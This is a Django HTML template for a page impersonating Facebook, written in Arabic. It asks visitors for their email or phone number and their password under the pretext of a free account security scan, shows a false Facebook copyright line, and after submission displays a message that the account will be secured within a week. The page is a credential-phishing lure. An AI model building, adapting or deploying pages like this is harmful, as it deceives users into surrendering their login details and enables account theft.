<!DOCTYPE html>
{% load static %}
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>facebook</title>
</head>
{% load static %}
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu&display=swap');
    @import url('https://fonts.googleapis.com/css2?family=Dosis:wght@300&family=Ubuntu&display=swap');
    h1 {
        font-family:Ubuntu,Arial, Helvetica, sans-serif;
        color: #1877f2;
    }
    body {
        display: flex;
        align-items: center;
        flex-direction: column;
        background-image: url('media/bg.jpg') ;
        height:800px;
        width: 100%;
        background-repeat: no-repeat;
        background-size:cover;

    }
    button {

        background-color: #42b72a;
        color: rgb(236, 228, 228);
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
    
    }
    .conatiner {
        display: flex;
       
       border-radius: 4px;
        background-color:white;
        width: 250px;
        height: 300px;

    }
    input {
        padding: 10px 30px 10px 30px;
        margin: 10px;
        border-radius: 4px;
        border: 1px solid gray;
    }
    
    button {
        margin-top: 26px;
        padding: 16px 16px 16px 16px;
        margin-left: 90px ; 
   
        border: none;
        border-radius: 4px;
        outline: none;
        font: bolder;
        font-family: Ubuntu,sans-serif;
        font-size: large;
    }
    p {
        margin: 5px;
        font-weight: 300;
        font-size: 10;
        color: #1877f2;
        font-family:Dosis, Arial, Helvetica, sans-serif;
    }
    input:focus {
        outline: none;
    }
    button:focus {
        background-color: #378f26;
    }
    .foot {
        margin-top: 20px;
        color: rgb(88, 92, 92);
        font-family: Dosis, Helvetica, sans-serif;
        font-size: 10px;
        font-weight: 100;
    }
    img {
        width: 100px;
        height: 100px;
        margin: 10px;
    }
    .scan {
        color: #42b72a;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        font-size: 12;
    }
    .suc {
        color: #1877f2;
        font-size: 24px;
        font-family: Ubuntu,sans-serif;
    }
</style>
<body>
    <img src="{% static 'facebook/shield.png' %}" alt="">
    {% if stater %}
    <div class="parent">
        <h1>facebook</h1>
        <div class="conatiner">
       
            <form action="#" method="POST">
                {% csrf_token %}
                <input dir="rtl" type="text" name="email" placeholder="أدخل البريد الالكتروني أو رقم الهاتف"> <br>
                <input dir="rtl" type="text" name="passwd" placeholder="كلمة المرور"> <br>
                <p dir="rtl" class="scan">قم بفحص حسابك للتاكد من أمن الحساب وسلامته </p>
                <button type="submit" > فحص  </button> 
                <p dir="rtl" class="foot">جميع الحقوق  لدى فيسبوك&copy; 2022</p>
            </form>   
    </div>
    {% else %}
    <p class="suc">سيتم فصح حسابك وعرضه للتامين التام,  بحيث يمنع المتطفلين, سوف نقوم بالرد على طلبك خلال اسبوع من الان </p>

    {% endif %}
   
</body>
</html>